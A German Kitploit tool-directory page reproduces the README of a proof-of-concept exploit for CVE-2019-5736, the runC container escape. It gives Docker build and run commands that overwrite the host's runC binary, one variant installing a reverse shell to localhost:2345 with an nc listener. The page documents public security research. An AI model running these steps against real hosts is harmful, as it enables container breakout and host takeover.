Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
POC-CVE-2019-5736 — Proof-of-Concept-Exploits für CVE-2019-5736, eine runC-Container-Escape-Schwachstelle, die den Containerausbruch über bösartige Images und exec-Befehle demonstriert. | Kitploit
Tools/GitHubGitHub/bbrathnayaka/poc-cve-2019-5736
Container-SicherheitPayload-GenerierungSchwachstellenanalyseExploitationRed TeamingContainer-Ausbruch
GitHubbbrathnayaka/poc-cve-2019-5736

POC-CVE-2019-5736

Proof-of-Concept-Exploits für CVE-2019-5736, eine runC-Container-Escape-Schwachstelle, die den Containerausbruch über bösartige Images und exec-Befehle demonstriert.

Repository anzeigen
14vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

RunC-CVE-2019-5736

Build Status Build Status Build Status Build Status Build Status


Video: https://bit.ly/2WqvILb

Blogbeitrag: [www.idealhax.blogspot.com/2020/05/breaking-out-of-docker-via-runc.html]

Hier möchte ich erwähnen, dass der ursprüngliche Entwickler dieses Exploits Yuval Avrahami von Twistlock Labs ist.

Ausführen der POCs

Beachten Sie, dass das Ausführen der POCs die runC-Binärdatei auf dem Host überschreibt.

Es wird dringend empfohlen, eine Kopie Ihrer runC-Binärdatei (normalerweise unter /usr/sbin/runc) zu erstellen, bevor Sie eines der POCs ausführen.

Klonen Sie das Repository:

root@kitploit:~
$ git clone [email protected]:BBRathnayaka/RunC-CVE-2019-5736.git

Exec POC

Überschreibt runc mit einem einfachen Programm, das eine Zeichenkette ausgibt.

Ausführen des Exec POC:

root@kitploit:~
$ docker build -t cve-2019-5736:exec_POC ./RunC-CVE-2019-5736/exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash

Malicious Image POC

Überschreibt runc mit einem einfachen Reverse-Shell-Bash-Skript, das eine Verbindung zu localhost:2345 herstellt.

Lauschen Sie auf die Reverse-Shell:

root@kitploit:~
$ nc -nvlp 2345

Führen Sie von einer anderen Shell aus das Malicious Image POC aus:

root@kitploit:~
$ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC

Reference

root@kitploit:~
See [Twistlock Labs](https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/ "Explaining CVE-2019-5736") for an explanation of CVE-2019-5736 and the POCs.

The malicious image POC is heavily based on [q3k’s POC](https://github.com/q3k/cve-2019-5736-poc), so all credit goes to him.
Tool herunterladen